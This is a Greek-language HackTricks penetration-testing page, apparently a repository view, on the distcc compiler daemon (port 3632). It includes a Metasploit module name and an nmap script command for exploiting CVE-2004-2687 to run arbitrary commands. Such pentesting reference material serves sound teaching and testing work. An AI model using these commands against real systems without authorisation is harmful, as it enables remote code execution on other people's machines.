hacktricks/network-services-pentesting/3632-pentesting-distcc.md
Translator workflow 35c6b081d2 Translated to Greek
2024-02-10 22:40:18 +00:00

4.7 KiB
Raw Blame History

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Βασικές Πληροφορίες

Το Distcc είναι ένα εργαλείο που βελτιώνει τη διαδικασία της συλλογής εκμεταλλευόμενο την ανενεργή επεξεργαστική ισχύ άλλων υπολογιστών στο δίκτυο. Όταν το distcc είναι εγκατεστημένο σε έναν υπολογιστή, αυτός ο υπολογιστής είναι ικανός να διανέμει τις εργασίες συλλογής σε ένα άλλο σύστημα. Αυτό το σύστημα πρέπει να εκτελεί το δαίμονα distccd και να έχει εγκατεστημένο έναν συμβατό μεταγλωττιστή για να επεξεργαστεί τον απεσταλμένο κώδικα.

Προεπιλεγμένη θύρα: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Εκμετάλλευση

Ελέγξτε αν είναι ευάλωτο στο CVE-2004-2687 για να εκτελέσετε αυθαίρετο κώδικα:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

Δεν νομίζω ότι το Shodan ανιχνεύει αυτήν την υπηρεσία.

Πόροι

Δημοσίευση δημιουργημένη από τον Álex B (@r1p)

Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks: